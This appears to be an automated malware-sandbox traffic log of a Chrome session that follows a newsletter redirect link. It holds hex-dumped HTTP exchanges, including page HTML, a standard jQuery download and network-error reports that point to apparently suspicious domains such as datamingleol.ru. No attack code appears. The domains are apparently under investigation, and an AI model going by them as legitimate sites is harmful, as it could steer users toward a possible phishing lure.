                                      2024-09-13 13:16:25 UTC1369INData Raw: 73 65 63 74 69 6f 6e 3e 0d 0a 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 70 79 2d 35 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 63 61 72 64 2d 69 6d 67 2d 74 6f 70 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 2e 62 69 6e 67 2e 63 6f 6d 2f 74 68 2f
                                      Data Ascii: section><section class="py-5 text-center"> <div class="container"> <div class="row"> <div class="col-lg-4 mb-4"> <div class="card"> <img class="card-img-top" src="https://th.bing.com/th/
                                      2024-09-13 13:16:25 UTC1369INData Raw: 6f 64 65 72 6e 2d 73 75 70 65 72 63 61 72 73 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 63 68 65 76 72 6f 6e 2d 72 69 67 68 74 22 3e 3c 2f 69 3e 20 52 65 61 64 20 4d 6f 72 65 3c 2f 61 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6c 67 2d 34 20 6d 62 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 61 72 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: odern-supercars" class="btn btn-primary"><i class="fas fa-chevron-right"></i> Read More</a> </div> </div> </div> <div class="col-lg-4 mb-4"> <div class="card">
                                      2024-09-13 13:16:25 UTC573INData Raw: 2f 61 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 76 61 6c 75 6d 69 6e 69 78 6f 2e 63 6f 6d 2e 64 65 2f 23 74 65 72 6d 73 22 20 63 6c 61 73 73 3d 22 74 65 78 74 2d 6c 69 67 68 74 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 73 20 66 61 2d 66 69 6c 65 2d 63 6f 6e 74 72 61 63 74 22 3e 3c 2f 69 3e 20 54 65 72 6d 73 3c 2f 61 3e 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6c 69 73 74 2d 69 6e 6c 69 6e 65 2d 69 74 65 6d
                                      Data Ascii: /a> </li> <li class="list-inline-item"> <a href="https://novaluminixo.com.de/#terms" class="text-light"><i class="fas fa-file-contract"></i> Terms</a> </li> <li class="list-inline-item
                                      2024-09-13 13:16:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      33192.168.2.449790151.101.66.1374434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:26 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                      Host: code.jquery.com
                                      Connection: keep-alive
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept: */*
                                      Sec-Fetch-Site: none
                                      Sec-Fetch-Mode: cors
                                      Sec-Fetch-Dest: empty
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:26 UTC613INHTTP/1.1 200 OK
                                      Connection: close
                                      Content-Length: 89501
                                      Server: nginx
                                      Content-Type: application/javascript; charset=utf-8
                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                      ETag: "28feccc0-15d9d"
                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                      Access-Control-Allow-Origin: *
                                      Cross-Origin-Resource-Policy: cross-origin
                                      Via: 1.1 varnish, 1.1 varnish
                                      Accept-Ranges: bytes
                                      Date: Fri, 13 Sep 2024 13:16:26 GMT
                                      Age: 2425169
                                      X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890022-NYC
                                      X-Cache: HIT, HIT
                                      X-Cache-Hits: 55, 443
                                      X-Timer: S1726233387.867726,VS0,VE0
                                      Vary: Accept-Encoding
                                      2024-09-13 13:16:26 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                      2024-09-13 13:16:27 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                      2024-09-13 13:16:27 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                      2024-09-13 13:16:27 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                      2024-09-13 13:16:27 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                      2024-09-13 13:16:27 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      34192.168.2.44979635.190.80.14434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:58 UTC538OUTOPTIONS /report/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3D HTTP/1.1
                                      Host: a.nel.cloudflare.com
                                      Connection: keep-alive
                                      Origin: https://datamingleol.ru
                                      Access-Control-Request-Method: POST
                                      Access-Control-Request-Headers: content-type
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:59 UTC336INHTTP/1.1 200 OK
                                      Content-Length: 0
                                      access-control-max-age: 86400
                                      access-control-allow-methods: POST, OPTIONS
                                      access-control-allow-origin: *
                                      access-control-allow-headers: content-length, content-type
                                      date: Fri, 13 Sep 2024 13:16:58 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      35192.168.2.44979735.190.80.14434928C:\Program Files\Google\Chrome\Application\chrome.exe
                                      TimestampBytes transferredDirectionData
                                      2024-09-13 13:16:59 UTC481OUTPOST /report/v4?s=AKj%2FpDoHOnyIEujKtMuVgP2GoHOddgsqedsy2ghMBPxCOCmwdWwmjxnn8WTqpfnNQHb%2BtUB6JlICJSER2twHg2UUJPmSnclkuvOfPkq%2BI5Uc0kM5Pyc1i3aEKbJvgTVA%2FEg%3D HTTP/1.1
                                      Host: a.nel.cloudflare.com
                                      Connection: keep-alive
                                      Content-Length: 1016
                                      Content-Type: application/reports+json
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                      Accept-Encoding: gzip, deflate, br
                                      Accept-Language: en-US,en;q=0.9
                                      2024-09-13 13:16:59 UTC1016OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 33 35 34 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 34 37 38 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 6d 69 6e 67 6c 65 6f 6c 2e 72 75 2f 74 4e 32 64 2f 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 71 75 65 6c 6c 61 73 2d 6e 65 77 73 6c 65 74 74 65 72 2e 62 65 65 68 69 69 76 2e 63 6f 6d 26 75 74 6d 5f 6d 65 64 69 75 6d 3d 6e 65 77 73 6c 65 74 74 65 72 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 66 69 6c 65 2d 66 6f 72 2d 72 65 76 69 65 77 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22
                                      Data Ascii: [{"age":33542,"body":{"elapsed_time":478,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://datamingleol.ru/tN2d/?utm_source=quellas-newsletter.beehiiv.com&utm_medium=newsletter&utm_campaign=file-for-review","sampling_fraction"
                                      2024-09-13 13:16:59 UTC168INHTTP/1.1 200 OK
                                      Content-Length: 0
                                      date: Fri, 13 Sep 2024 13:16:59 GMT
                                      Via: 1.1 google
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      020406080s020406080100

                                      Click to jump to process

                                      020406080s0.0050100MB

                                      Click to jump to process

                                      Target ID:0
                                      Start time:09:15:40
                                      Start date:13/09/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:2
                                      Start time:09:15:43
                                      Start date:13/09/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2688 --field-trial-handle=1900,i,13536425963766197669,2615217112724930602,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:false

                                      Target ID:3
                                      Start time:09:15:46
                                      Start date:13/09/2024
                                      Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://link.sbstck.com/redirect/9f1a559b-1924-42a1-ac63-d801d0b621e3"
                                      Imagebase:0x7ff76e190000
                                      File size:3'242'272 bytes
                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      No disassembly